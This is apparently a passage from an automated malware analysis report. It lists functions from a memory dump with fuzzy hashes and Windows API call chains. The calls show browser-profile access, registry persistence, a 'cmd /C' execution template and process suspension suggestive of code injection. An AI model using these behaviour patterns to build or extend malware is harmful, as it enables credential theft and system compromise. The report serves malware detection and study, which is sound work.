    • Part of subcall function 001D6D18: ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 001D6D72
    • Part of subcall function 001D6D18: GetLastError.KERNEL32(?,?,001D6DE7,00000000,001C797E,001C797E,00000000,00000000,00000000,001C767C,001C797E,001C797E,00000000,00000000,00000000), ref: 001D6D97
    • Part of subcall function 001D6D18: CloseHandle.KERNEL32(000000FF), ref: 001D6DA8
Strings
  • %APPDATA%\Mozilla\Firefox\Profiles, xrefs: 001C6CA7
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C838C, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 102 Total matches: 54memory
Similarity
  • Total matches: 54
  • API ID: HeapFreeRtlAllocateHeap
  • String ID: https://
  • API String ID: 3817218409-4275131719
  • Opcode ID: f288712f8a6e8bd0bf07739e93ef791456e10643a80339435031cd9f7b6ed460
  • Instruction ID: 0d42b4968aba57015724f328e6a5f9a864d8608e83dd0059b415151ddedf116b
  • Opcode Fuzzy Hash: 18F08B601A85C2A6802718C294AC7B2C604BE80AC0D8D536FFF503929E5FA770D5BB0A
  • Instruction Fuzzy Hash: 0d42b4968aba57015724f328e6a5f9a864d8608e83dd0059b415151ddedf116b
APIs
    • Part of subcall function 001C5ADD: GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C5AEB
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C83ED
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C843C
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6E41
    • Part of subcall function 001D6DF6: WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
    • Part of subcall function 001D6DF6: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
    • Part of subcall function 001D6DF6: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
    • Part of subcall function 001D6DF6: SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6EDD
    • Part of subcall function 001D6DF6: CloseHandle.KERNEL32(00000006), ref: 001D6EE9
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C8471
  • HeapFree.KERNEL32(00000000,?), ref: 001C8481
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C3F95, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80 Total matches: 37memorystring
Similarity
  • Total matches: 37
  • API ID: HeapFree$RtlAllocateHeaplstrcmpi
  • String ID: Main
  • API String ID: 2523190637-521822810
  • Opcode ID: f2d70ba1db336b0a4ac6973dd472b45d7992a95be766767dbdcbf8c120d66562
  • Instruction ID: 50267dbfc79e7e53958b6cba9acd06bd661d4a86ea51a5bd4c245a4c386a7ff5
  • Opcode Fuzzy Hash: 8DF095610946C3D35417545580B03B89004AFD22F2C4D43FAE9303D1CB7E1235D7765F
  • Instruction Fuzzy Hash: 50267dbfc79e7e53958b6cba9acd06bd661d4a86ea51a5bd4c245a4c386a7ff5
APIs
    • Part of subcall function 001DDAD4: memcpy.NTDLL(00000000,00000084,00000084,001CD4DC,00000000,00000000,001DDB4C,001CD4DC,001CD4DC,001CD4DC,00000000,?,?,001C4CB1,00000000,00000001), ref: 001DDAF2
    • Part of subcall function 001DDAD4: memset.NTDLL ref: 001DDB24
  • RtlAllocateHeap.NTDLL(00000000,00000008,-00000008), ref: 001C3FE9
  • lstrcmpi.KERNEL32(00000000,001ED273), ref: 001C4009
    • Part of subcall function 001C5816: lstrlen.KERNEL32(00000008,?,?,?,001C402D,00000000,00000000), ref: 001C5876
    • Part of subcall function 001C5816: HeapFree.KERNEL32(00000000,00000000), ref: 001C5898
    • Part of subcall function 001C5816: memcpy.NTDLL(00000000,00000000,00000000,?,?,?,001C402D,00000000,00000000), ref: 001C58AA
    • Part of subcall function 001C5816: lstrcpy.KERNEL32(00000020,00000008), ref: 001C58DC
    • Part of subcall function 001C5816: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C58E8
    • Part of subcall function 001C5816: Sleep.KERNEL32(0000000A), ref: 001C58F2
    • Part of subcall function 001C5816: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5940
    • Part of subcall function 001C3F4D: RegCloseKey.ADVAPI32(?,?,?,001C403B,00000000,?,?,00000000,00000000,-00000008), ref: 001C3F87
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C404E
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C405F
    • Part of subcall function 001DD67D: RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DD68A
    • Part of subcall function 001DD67D: Sleep.KERNEL32(0000000A,?,?,001DD703,001EB1C8,001EAD10,00000000,001DDF84), ref: 001DD694
    • Part of subcall function 001DD67D: RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DD6E3
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C4202, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 63 Total matches: 53memoryregistry
Similarity
  • Total matches: 53
  • API ID: HeapFreeRegCloseKeyRegOpenKeyRtlAllocateHeap
  • String ID: Main
  • API String ID: 1238789381-521822810
  • Opcode ID: 430bf3c3e099aaf98ba0d13378e5d8da2de179d3274a2f5d09db6df723472999
  • Instruction ID: 8f29cc0f23f969ede819062a95f7fcd74d74c9a74bdfea75fafa15d21f68d3cc
  • Opcode Fuzzy Hash: CAE026B00A45C5AA403B7C81647B2F29410F9A08C20CD976BEE009F28CAE4670A27B9A
  • Instruction Fuzzy Hash: 8f29cc0f23f969ede819062a95f7fcd74d74c9a74bdfea75fafa15d21f68d3cc
APIs
  • RegOpenKeyA.ADVAPI32(80000001,?), ref: 001C4220
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C4256
  • HeapFree.KERNEL32(00000000,?), ref: 001C428F
  • RegCloseKey.ADVAPI32(?), ref: 001C4298
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C29BF, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41 Total matches: 45memorystring
Similarity
  • Total matches: 45
  • API ID: CreateDirectoryHeapFreeRtlAllocateHeaplstrlen
  • String ID: %APPDATA%\Microsoft\
  • API String ID: 3959905781-2699254172
  • Opcode ID: a91e168cb75582dc69dc678417b6008db4073c04297a41e19573c560bdc487dc
  • Instruction ID: cffe0b6492667c1a66e0568daab83b9343bd146d6441e28ba88ab90f7e1d944e
  • Opcode Fuzzy Hash: 10D05EB0444802AB953BA426806A739884A7F823D0C5E7536E9404A26FBB9362956E6A
  • Instruction Fuzzy Hash: cffe0b6492667c1a66e0568daab83b9343bd146d6441e28ba88ab90f7e1d944e
APIs
  • RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C29D8
    • Part of subcall function 001D6CC6: lstrlen.KERNEL32(?,?,00000000,?,00000000,001C7543,?,?,?,?,?,?,?,?,?,001C1255), ref: 001D6CD5
  • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,001C2A7A,00000000), ref: 001C2A06
  • lstrlenW.KERNEL32(00000000,?,?,001C2A7A,00000000), ref: 001C2A12
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C2A2A
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D9EAA, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 33 Total matches: 56memorystring
Similarity
  • Total matches: 56
  • API ID: lstrlen$RtlAllocateHeap
  • String ID: [FILE]$DllRegisterServer
  • API String ID: 2544908171-3029713317
  • Opcode ID: 2d4b95e8c34fd7eb35c32aaba08f5fcf9921a6e8c8be63207aa385bfa2f516c2
  • Instruction ID: 5cabe30f11294075a22546247cc9a04f0ebb488a8614786e1935660b83a97d3e
  • Opcode Fuzzy Hash: 73C012709914038B04177926842423CC68A39957E540E0619E8473611A5B0302CD5A1E
  • Instruction Fuzzy Hash: 5cabe30f11294075a22546247cc9a04f0ebb488a8614786e1935660b83a97d3e
APIs
  • lstrlenW.KERNEL32(00000000,00000000,00000000,.dll,001C2B1B,00000000,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001D9EB8
  • lstrlen.KERNEL32(DllRegisterServer), ref: 001D9EC6
  • RtlAllocateHeap.NTDLL(00000000,00000022), ref: 001D9EDB
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CAF14, Relevance: 7.7, APIs: 5, Instructions: 174 Total matches: 40memory
Similarity
  • Total matches: 40
  • API ID: HeapFreeInterlockedExchangeRtlAllocateHeapmemcpywsprintf
  • String ID:
  • API String ID: 3372225998-0
  • Opcode ID: 61e3c6596c7711a58e405f94e11cad7776fca466765ac99ea6157a7d77fb77b6
  • Instruction ID: da8d2039801b4c8d43c4b5d75199c0239940cb1666a4492243b1b8028872bfb2
  • Opcode Fuzzy Hash: B6110E75048A40CF89337492402A6BBDA81BD914C798C9763E90C3A5AF4903F29B7F07
  • Instruction Fuzzy Hash: da8d2039801b4c8d43c4b5d75199c0239940cb1666a4492243b1b8028872bfb2
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001CAF93
    • Part of subcall function 001D8FBB: GetLocalTime.KERNEL32(?), ref: 001D8FC5
    • Part of subcall function 001D8FBB: wsprintfA.USER32 ref: 001D8FF1
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CB0F1
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
  • wsprintfA.USER32 ref: 001CB04B
  • memcpy.NTDLL(00000000,?,?), ref: 001CB090
  • InterlockedExchange.KERNEL32(001EAFEC,00000000), ref: 001CB0AE
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
    • Part of subcall function 001C5B7B: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001C5BA4
    • Part of subcall function 001C5B7B: memcpy.NTDLL(00000000,?,?), ref: 001C5BB7
    • Part of subcall function 001C5B7B: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C5BC8
    • Part of subcall function 001C5B7B: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5BDD
    • Part of subcall function 001C5B7B: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C5C15
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C8B4E, Relevance: 7.6, APIs: 5, Instructions: 125 Total matches: 56memory
Similarity
  • Total matches: 56
  • API ID: HeapFreememcpy$RtlAllocateHeap
  • String ID:
  • API String ID: 1281497405-0
  • Opcode ID: c91cc279de764e5f2579d6076ec579c7e1ff7f10485d5d5ea4a8a547ad6caca9
  • Instruction ID: 3ae8df9311abcb48d6f96013da2b6f76f4bc533e0507b6b7ad3ca337a4177261
  • Opcode Fuzzy Hash: D1014E13C804C3878807342E9024AB8C449BE822C0DCDD316AA081C13F8BA232B7764F
  • Instruction Fuzzy Hash: 3ae8df9311abcb48d6f96013da2b6f76f4bc533e0507b6b7ad3ca337a4177261
APIs
    • Part of subcall function 001C8692: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C86CC
  • RtlAllocateHeap.NTDLL(00000000,001E5065,?), ref: 001C8BEE
  • memcpy.NTDLL(00000000,00000000,00000000), ref: 001C8C05
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8C18
  • memcpy.NTDLL(00000000,?,?), ref: 001C8C27
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C8C8B
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
    • Part of subcall function 001DAA89: RtlLeaveCriticalSection.NTDLL(?), ref: 001DAB06
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C45F0, Relevance: 7.6, APIs: 5, Instructions: 121 Total matches: 58memoryregistrysynchronization
Similarity
  • Total matches: 58
  • API ID: HeapFree$RegCloseKeyWaitForSingleObject
  • String ID:
  • API String ID: 3052965740-0
  • Opcode ID: d3c070adaf0f083c3fd626d879ba680c8654bd575e600ed9f9379d1952a7449c
  • Instruction ID: ae659000fd8a6ff0622346f66fb9775bf8617b043a7e92e8c3d009521b2ea922
  • Opcode Fuzzy Hash: 1B01F521055AD313C12BA88192BA3FA8505BF829E1D4D1737FEB81E18C5F4721E6A707
  • Instruction Fuzzy Hash: ae659000fd8a6ff0622346f66fb9775bf8617b043a7e92e8c3d009521b2ea922
APIs
    • Part of subcall function 001C3BF0: RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
    • Part of subcall function 001C3BF0: RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
    • Part of subcall function 001C3BF0: lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
  • HeapFree.KERNEL32(00000000,?), ref: 001C46AF
  • WaitForSingleObject.KERNEL32(00000000), ref: 001C4713
  • HeapFree.KERNEL32(00000000,?), ref: 001C473C
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C474C
  • RegCloseKey.ADVAPI32(?,?,?,00000000,001CB4E0,00000000,00000000,?,001CD6FE), ref: 001C4755
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7878, Relevance: 7.6, APIs: 5, Instructions: 107 Total matches: 58memorystring
Similarity
  • Total matches: 58
  • API ID: HeapFree$RtlAllocateHeaplstrlenwsprintf
  • String ID:
  • API String ID: 4063120414-0
  • Opcode ID: 82a566ac4b7e44f40389d82a26e71ca4d0b382ca24f9de814279e5df00d9b999
  • Instruction ID: ea15a0fccfaea50bf9a426a543ac3d3c6aed45562802de59e2cba04bd230a37d
  • Opcode Fuzzy Hash: 10F0F4A4112C418A8C56A6F1989CB7852C85B925FDD4E3313A76C314EB3B13335EBE4D
  • Instruction Fuzzy Hash: ea15a0fccfaea50bf9a426a543ac3d3c6aed45562802de59e2cba04bd230a37d
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C77DE: RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C77DE: HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
  • lstrlen.KERNEL32(00000000,001ECDBE,00000000,001ECDAC,00000000,001ECD98,00000000,001ECE3B,00000000,001ECE30,00000000,001ECD88,00000000,00002334), ref: 001C792A
  • RtlAllocateHeap.NTDLL(00000000,-0000000C), ref: 001C793F
  • wsprintfA.USER32 ref: 001C7954
    • Part of subcall function 001C7422: memset.NTDLL ref: 001C743A
    • Part of subcall function 001C7422: lstrlenW.KERNEL32(00000000,00000000,00000000,001EAD10,00000000,cmd /C "%s> %s1"), ref: 001C7473
    • Part of subcall function 001C7422: wcstombs.NTDLL ref: 001C747D
    • Part of subcall function 001C7422: CreateProcessA.KERNEL32(00000000,001C7831,00000000,00000000,00000000,0C000000,00000000,?,00000044,?), ref: 001C74B1
    • Part of subcall function 001C7422: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C74D2
    • Part of subcall function 001C7422: GetExitCodeProcess.KERNEL32(?,?), ref: 001C74EF
    • Part of subcall function 001C7422: GetLastError.KERNEL32 ref: 001C7507
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C796E
    • Part of subcall function 001C7664: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C76B4
    • Part of subcall function 001C7664: GetLastError.KERNEL32(?,00000000,001C797E), ref: 001C76E5
    • Part of subcall function 001C7664: HeapFree.KERNEL32(00000000,00000000), ref: 001C76F7
    • Part of subcall function 001C7664: HeapFree.KERNEL32(00000000,001C797E), ref: 001C770C
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C7998
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C439B, Relevance: 7.6, APIs: 5, Instructions: 98 Total matches: 56timememory
Similarity
  • Total matches: 56
  • API ID: CreateWaitableTimerGetLastErrorGetSystemTimeAsFileTimeHeapFreeOpenWaitableTimer
  • String ID:
  • API String ID: 1165046961-0
  • Opcode ID: dcf0f1391520f43fe6097fd0f752f71d1dc6f160b6cfea933156b7ea3217ac6e
  • Instruction ID: 47380e5463a91fa5f58a51e79f45711cdea6db2302c913f91e1116e2b5f0794b
  • Opcode Fuzzy Hash: 3BF02BA00A858783E07B64608177BB58300EBC25D5D8C2733F65D5DB5D8F46B1A2FA25
  • Instruction Fuzzy Hash: 47380e5463a91fa5f58a51e79f45711cdea6db2302c913f91e1116e2b5f0794b
APIs
  • OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 001C43B2
  • CreateWaitableTimerA.KERNEL32(001EB0D8,?,?), ref: 001C43D1
  • GetLastError.KERNEL32 ref: 001C43E1
    • Part of subcall function 001C3C55: RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
    • Part of subcall function 001C3C55: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
    • Part of subcall function 001C3C55: HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
    • Part of subcall function 001C3C55: RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
  • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000002,?), ref: 001C4428
  • HeapFree.KERNEL32(00000000,00000002,00000000), ref: 001C445C
    • Part of subcall function 001C4349: GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C4356
    • Part of subcall function 001C4349: SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 001C4390
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C9F0B, Relevance: 7.6, APIs: 5, Instructions: 95 Total matches: 59memorystring
Similarity
  • Total matches: 59
  • API ID: HeapFreeRtlAllocateHeaplstrcpylstrcpynlstrlen
  • String ID:
  • API String ID: 2577868549-0
  • Opcode ID: 1d80e047f999f10d401b9f46cfff4084342c566a149a0ba19b39b0a0f7985056
  • Instruction ID: 2369ec942959bcc0f81c5e1f9b71a5b6904734b35236ac73d6e48e3a05a83d19
  • Opcode Fuzzy Hash: C6F08B2B448E429BC027204202A67D8E71CBB818DAC4D8B319884795AE2EC272225B0A
  • Instruction Fuzzy Hash: 2369ec942959bcc0f81c5e1f9b71a5b6904734b35236ac73d6e48e3a05a83d19
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000007), ref: 001C9F8D
  • lstrcpy.KERNEL32(00000000,001EC424), ref: 001C9F9F
  • lstrcpyn.KERNEL32(00000006,?,00000001,?,?,?,?,?,00000000,00000000,?), ref: 001C9FAC
  • lstrlen.KERNEL32(001EC424,?,?,?,?,?,00000000,00000000,?), ref: 001C9FBE
    • Part of subcall function 001CA73F: RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 001CA760
    • Part of subcall function 001CA73F: wsprintfA.USER32 ref: 001CA775
    • Part of subcall function 001CA73F: RegCreateKeyA.ADVAPI32(80000001,001EB240,00000000), ref: 001CA78D
    • Part of subcall function 001CA73F: RegCloseKey.ADVAPI32(?), ref: 001CA7B5
    • Part of subcall function 001CA73F: HeapFree.KERNEL32(00000000,00000000), ref: 001CA7C4
    • Part of subcall function 001CAF14: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CAF93
    • Part of subcall function 001CAF14: wsprintfA.USER32 ref: 001CB04B
    • Part of subcall function 001CAF14: memcpy.NTDLL(00000000,?,?), ref: 001CB090
    • Part of subcall function 001CAF14: InterlockedExchange.KERNEL32(001EAFEC,00000000), ref: 001CB0AE
    • Part of subcall function 001CAF14: HeapFree.KERNEL32(00000000,00000000), ref: 001CB0F1
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C9FEF
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C44E2, Relevance: 7.6, APIs: 5, Instructions: 90 Total matches: 117synchronization
Similarity
  • Total matches: 117
  • API ID: GetLastError$CloseHandleReleaseMutexWaitForMultipleObjects
  • String ID:
  • API String ID: 981764843-0
  • Opcode ID: e0028ebea731b05e1f81d164d1b0c22b432d0313b7510209d972350b2e9e1cbf
  • Instruction ID: 983f2bdd78a01378a5524cb3713f7215791f28ca6a77dfb9313747591b0c8092
  • Opcode Fuzzy Hash: 63F06276110C810BCE276554A46279A5A106FC23F048C1753FFF66A1EF1B527AD21B8A
  • Instruction Fuzzy Hash: 983f2bdd78a01378a5524cb3713f7215791f28ca6a77dfb9313747591b0c8092
APIs
    • Part of subcall function 001C44A4: OpenMutexA.KERNEL32(00100001,00000000,?), ref: 001C44B0
    • Part of subcall function 001C44A4: SetLastError.KERNEL32(000000B7,?,001C44F5), ref: 001C44C1
    • Part of subcall function 001C44A4: CreateMutexA.KERNEL32(001EB0D8,00000000,?,?,001C44F5), ref: 001C44D4
  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C4515
  • CloseHandle.KERNEL32(00000000), ref: 001C45D3
    • Part of subcall function 001C439B: OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 001C43B2
    • Part of subcall function 001C439B: CreateWaitableTimerA.KERNEL32(001EB0D8,?,?), ref: 001C43D1
    • Part of subcall function 001C439B: GetLastError.KERNEL32 ref: 001C43E1
    • Part of subcall function 001C439B: GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000002,?), ref: 001C4428
    • Part of subcall function 001C439B: HeapFree.KERNEL32(00000000,00000002,00000000), ref: 001C445C
  • GetLastError.KERNEL32 ref: 001C45BC
  • ReleaseMutex.KERNEL32(00000000), ref: 001C45C5
  • GetLastError.KERNEL32 ref: 001C45E0
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CAD95, Relevance: 7.6, APIs: 5, Instructions: 85 Total matches: 58memorystring
Similarity
  • Total matches: 58
  • API ID: memcpy$HeapFreeRtlAllocateHeaplstrcmpi
  • String ID:
  • API String ID: 857938089-0
  • Opcode ID: 4b4a78c487d6048ee3f3895cdad3a98188a4a88c0ba2f47e4ae26dadc0163ad9
  • Instruction ID: 3f52a085e5dd49b5850e34594fd6f7df3e0d62c374d676f882949c6103c053a0
  • Opcode Fuzzy Hash: C5F09E214D05C251D61B10B45894B94E946FE823B3C8DA7379C047908B2A4221A9B5EF
  • Instruction Fuzzy Hash: 3f52a085e5dd49b5850e34594fd6f7df3e0d62c374d676f882949c6103c053a0
APIs
    • Part of subcall function 001C57CC: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C57D4
    • Part of subcall function 001C57CC: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C57E9
    • Part of subcall function 001C57CC: InterlockedIncrement.KERNEL32(0000001C), ref: 001C5802
  • RtlAllocateHeap.NTDLL(00000000,?,001ED278), ref: 001CADC5
  • memcpy.NTDLL(00000000,?,?), ref: 001CADD6
    • Part of subcall function 001C5761: InterlockedDecrement.KERNEL32(0000001C), ref: 001C5765
  • lstrcmpi.KERNEL32(00000002,?), ref: 001CAE1C
  • memcpy.NTDLL(00000000,?,?), ref: 001CAE30
  • HeapFree.KERNEL32(00000000,00000000,001ED278), ref: 001CAE6F
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C59D7, Relevance: 7.6, APIs: 5, Instructions: 83 Total matches: 27memorytime
Similarity
  • Total matches: 27
  • API ID: GetSystemTimeAsFileTimeInterlockedIncrementRtlAllocateHeapRtlEnterCriticalSectionRtlLeaveCriticalSection
  • String ID:
  • API String ID: 2335115045-0
  • Opcode ID: 87b7f9457d6eb4fb8a765cd00379997a4ae998d37287d2c68f8de9ad653ea43e
  • Instruction ID: a533ae1a33582a8b524e606b503d101fc491c8f586016c526a9c3a1c080ca75d
  • Opcode Fuzzy Hash: 73F08BB11645925BD10230500D063B7F90AFBB13EAC4DFE12DD20342AB3F8321266BAC
  • Instruction Fuzzy Hash: a533ae1a33582a8b524e606b503d101fc491c8f586016c526a9c3a1c080ca75d
APIs
    • Part of subcall function 001DDA6F: lstrlen.KERNEL32(?,001EB160,001E5128,?,001DE5BF,?,00000000,001E5128,00000000,001EB16C,001EB16C,?,001DE11D,?,?,?), ref: 001DDA7B
  • RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C5A01
  • RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5A14
  • GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C5A25
  • RtlAllocateHeap.NTDLL(00000000,001EB264,?), ref: 001C5A90
  • InterlockedIncrement.KERNEL32(001EB25C), ref: 001C5AA7
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DC4E7, Relevance: 7.6, APIs: 5, Instructions: 81 Total matches: 95
Similarity
  • Total matches: 95
  • API ID: CloseHandleGetLastError$OpenProcess
  • String ID:
  • API String ID: 3618605412-0
  • Opcode ID: f3c28a13a8270d655170a0e3c90d88c5c03aaf1802dd5309b87f7072ec2badc3
  • Instruction ID: ee927bb26a947277b8e3b3d91228e1c9832b26c7ffbdb67feee30960427366c3
  • Opcode Fuzzy Hash: 13F09E78181666838027B06098507FBF645FE821CF6AC3610F6603108A47563AD76754
  • Instruction Fuzzy Hash: ee927bb26a947277b8e3b3d91228e1c9832b26c7ffbdb67feee30960427366c3
APIs
    • Part of subcall function 001D8325: GetModuleHandleA.KERNEL32(001EC01D,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D833F
    • Part of subcall function 001D8325: GetProcAddress.KERNEL32(00000000,001EDA66,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D8350
    • Part of subcall function 001D8325: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D836D
    • Part of subcall function 001D8325: IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D837E
    • Part of subcall function 001D8325: CloseHandle.KERNEL32(00000000), ref: 001D8391
  • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000001), ref: 001DC517
  • GetLastError.KERNEL32(?,?,00000001), ref: 001DC59A
    • Part of subcall function 001DC371: memset.NTDLL ref: 001DC393
    • Part of subcall function 001DC371: ResumeThread.KERNEL32(?,00000000,?,?,00000000,?,00010007,00000004,?), ref: 001DC42A
    • Part of subcall function 001DC371: WaitForSingleObject.KERNEL32(00000064), ref: 001DC438
    • Part of subcall function 001DC371: SuspendThread.KERNEL32(?), ref: 001DC450
    • Part of subcall function 001DC371: GetLastError.KERNEL32(00000000,?,00010007,00000004,?), ref: 001DC4C5
    • Part of subcall function 001DC371: ResumeThread.KERNEL32(00000004), ref: 001DC4D6
  • CloseHandle.KERNEL32(00000000), ref: 001DC592
  • CloseHandle.KERNEL32(?), ref: 001DC5AD
  • GetLastError.KERNEL32(?,?,00000001), ref: 001DC5B5
Memory Dump Source
